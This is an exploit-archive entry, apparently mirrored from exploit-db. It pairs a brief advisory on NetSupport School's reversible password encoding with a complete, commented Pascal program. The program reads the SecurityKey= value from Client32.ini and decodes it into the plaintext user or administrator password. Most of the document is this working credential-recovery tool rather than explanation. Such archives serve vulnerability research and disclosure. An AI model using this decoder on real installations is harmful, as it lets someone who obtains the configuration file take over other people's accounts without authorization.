exploit-db-mirror/exploits/linux/local/23882.pas

source: https://www.securityfocus.com/bid/9981/info
NetSupport School is prone to a password-encryption vulnerability: the application stores its client password under a weak, reversible encoding rather than a one-way hash, so the stored value can be turned back into the plaintext. The program below demonstrates this by reading the SecurityKey= value from Client32.ini and printing the recovered password.
Anyone who can read the client configuration file (a local user, or an attacker who obtains a copy of Client32.ini) can recover the user and administrator passwords for the affected application.
program name;
uses crt;
{ Globals shared by every routine below.
  i      - loop counter reused by conv, hex and compare (it is not local to them)
  length - number of characters read from the SecurityKey= line; note that this
           variable shadows the built-in Length function
  crazy  - per-pair offset handed to hex by the main block }
var i,j,length,x,y,crazy:integer;
{ Client32.ini, opened for reading by the main block }
passfile:text;
line:string;
{ password - raw SecurityKey= characters (at most 100 fit)
  p        - recovered plaintext, one char per two-character pair }
password,p:array [1..100] of char;
{ known   - reference pairs indexed by plaintext position (only rows 1..15 are filled in)
  convert - letter -> two-character code table built by conv; column 3 holds the letter }
known,convert:array [1..26,1..3] of char;
{ tempx/tempy receive the pair produced by hex }
ch,tempx,tempy,key:char;
{ Build the letter-to-code table convert[]. Row r (1..26) describes the letter
  chr(64+r): columns 1..2 hold its two-character code and column 3 the letter
  itself. The codes are consecutive base-16 numbers whose digits are the
  characters 'A'..'P' (values 0..15), starting at 'EM' for 'A' and carrying
  into the first character after 'P'. Uses the global counter i like the
  rest of the program. }
procedure conv;
begin
for i:=1 to 26 do begin
{ 'EM' is 4*16+12 = 76, so row i carries the value 76+(i-1) = 75+i }
convert[i,1]:=chr(65+(75+i) div 16);
convert[i,2]:=chr(65+(75+i) mod 16);
convert[i,3]:=chr(64+i);
end;
end;
{ Move the two-character pair (a,b) by num positions in the 'A'..'P' base-16
  alphabet (b is the low digit, a the high one) and leave the result in the
  globals tempx/tempy. A positive num steps forward with carry after 'P', a
  negative num steps backward with borrow before 'A'; num=0 copies the pair
  unchanged. Characters outside 'A'..'P' are simply stepped without wrapping,
  as in the original. Uses the global counter i. }
procedure hex(a,b:char; num:integer);
begin
i:=0;
{ forward: one step per iteration until i reaches num }
while i<num do begin
if b='P' then begin
b:='A';
a:=succ(a);
end
else b:=succ(b);
inc(i);
end;
{ backward: runs only when num is negative }
while i>num do begin
if b='A' then begin
b:='P';
a:=pred(a);
end
else b:=pred(b);
dec(i);
end;
tempx:=a;
tempy:=b;
end;
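{ Map an encoded pair (a,b) back to the plain letter it stands for, using the
  table filled in by conv. Returns #0 when the pair is not in the table; the
  original left the function result unassigned in that case. Not called
  anywhere in this program. Uses the global counter i. }
function compare(a,b:char):char;
begin
compare:=#0;
for i:=1 to 26 do begin
if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64);
end;
end;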
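{ Distance between two encoded pairs: (c,d) minus (a,b). Each pair is read as a
  base-16 number built from the raw character codes (ord(hi)*16 + ord(lo)); the
  constant offset of the digit alphabet cancels in the subtraction, so only the
  distance between the pairs matters. The dead "num2:=num2" and the unused
  num3 of the original are dropped. }
function diff(a,b,c,d:char):integer;
var num1,num2:integer;
begin
num1:=ord(a)*16+ord(b);
num2:=ord(c)*16+ord(d);
diff:=num2-num1;
end;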
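Begin
{ Read the SecurityKey= value out of Client32.ini, then decode it one
  two-character pair at a time. Works entirely on the program's globals. }
clrscr;
Writeln(' _________________________________________________________');
Writeln('|NetSupport School Pro Password decryptor |');
Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');
Writeln('|and my wonderful fiance Halley |');
Writeln(' ---------------------------------------------------------');
Writeln('');
{ The install path is hard-coded (8.3 short names). With default I/O checking
  a missing file stops the program with a runtime error at reset. }
assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini');
reset (passfile);
i:=0;
length:=0; { stays 0 when no SecurityKey= line is present }
while not eof(passfile) do
begin
line:='';
while not EoLn(passfile) do
begin
Read(passfile, ch);
line:=line+ch;
{ matches only when the key name opens the line, spelled exactly like this }
if line='SecurityKey=' then begin
{ copy the rest of the line, but never past password[100]: the original kept
  writing beyond the end of the array for a longer value }
while (not eoln(passfile)) and (i<100) do
begin
inc(i);
read(passfile,ch);
password[i]:=ch;
end;
length:=i;
end;
end;
readln(passfile,line);
end;
close(passfile); { the original never closed the file }
if length=0 then begin
writeln('No SecurityKey= entry found in Client32.ini');
readkey;
halt;
end;
write('Hash: ');
for i:=1 to length do write(password[i]);
writeln('');
{decrypt the hash}
conv;
{ reference pairs, one per plaintext position; only positions 1..15 are known }
known[1,1]:='E';
known[1,2]:='M';
known[2,1]:='9';
known[2,2]:='O';
known[3,1]:='>';
known[3,2]:='A';
known[4,1]:='B';
known[4,2]:='C';
known[5,1]:='F';
known[5,2]:='E';
known[6,1]:=':';
known[6,2]:='G';
known[7,1]:='>';
known[7,2]:='I';
known[8,1]:='B';
known[8,2]:='K';
known[9,1]:='F';
known[9,2]:='M';
known[10,1]:=':';
known[10,2]:='O';
known[11,1]:='?';
known[11,2]:='A';
known[12,1]:='C';
known[12,2]:='C';
known[13,1]:='G';
known[13,2]:='E';
known[14,1]:=';';
known[14,2]:='G';
known[15,1]:='?';
known[15,2]:='I';
{ j = number of two-character pairs in the key. round() is kept from the
  original; for an odd length the last pair also picks up password[length+1]. }
j:=round(length/2);
if j>15 then
writeln('Note: only the first 15 characters can be recovered; known[] has no rows past 15');
{ unrecovered positions hold 'A' (value 0) until they are decoded }
for i:=1 to j do p[i]:=chr(65);
for x:=1 to j do begin
{ positions past the known table are skipped instead of reading unset (or,
  past 26, out-of-range) known[] cells. Pairs 1..15 only depend on the p[]
  entries decoded before them, so their result is the same as before. }
if x<=15 then begin
{ offset = (x - j) minus the sum of the plaintext values decoded so far }
crazy:=-j+x;
for y:=1 to j do crazy:=crazy-(ord(p[y])-65);
hex(password[x*2-1],password[x*2],crazy);
p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65);
end;
end;
writeln('');
write('Password: ');
for i:=1 to j do
if i<=15 then write(p[i]);
readkey;
end.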